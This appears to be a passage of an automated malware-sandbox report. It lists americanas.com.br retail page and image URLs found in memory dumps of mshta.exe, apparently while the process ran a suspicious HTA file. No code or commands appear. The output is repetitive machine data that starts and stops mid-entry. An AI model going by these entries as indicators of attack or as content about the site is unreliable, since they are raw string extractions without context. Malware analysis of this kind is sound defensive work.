                                                                                                                                                                                            https://www.americanas.com.br/categoria/utilidades-domesticas?chave=pfm_home_ud_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.americanas.com.br/hotsite/assessoria-imprensa?chave=dk_hm_ft_00_03_imprensamshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=prf_hm_0_tt_9_cupommshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-mob-19fde28501d5.pngmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12569631340.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.americanas.com.br/busca/guarda-roupa-bergamomshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://images-americanas.b2w.io/produtos/7503637854/imagens/conjunto-com-40-bolas-de-4cm-vermelha-emshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396040863.000000000DB61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-enfeites-de-natal-e13cbf8mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580125535.000000000C141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.americanas.com.br/categoria/vale-presente?chave=pfm_home_valepresentes_menumshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/04/5-banners_home_mob-campanhas-home-300x450-86mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575123747.000000000968C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.americanas.com.br/categoria/enfeites-de-natal/toalha-de-mesa-natalinamshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.pngamshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-mobile-648x54-2362be2b92fb.pngmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://www.americanas.com.br/categoria/celulares-e-smartphones/smartphone/iphone?ordenacao=topSellimshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551427723.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556317603.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396485604.00000000069FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579886236.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555082549.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573530715.0000000009530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.americanas.com.br/hotsite/app?chave=dk_hm_ats_2_1_baixeoappmshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509151573.000000000BE37000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508834101.000000000BE2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.pngVmshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510409430.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://www.americanas.com.br/categoria/eletroportateis/ferro-de-passar?chave=pfm_hm_tt_1_0_ferro-demshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509110042.00000000095FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512897588.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511109691.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566725542.0000000009602000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://carreiras.americanas.com/mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 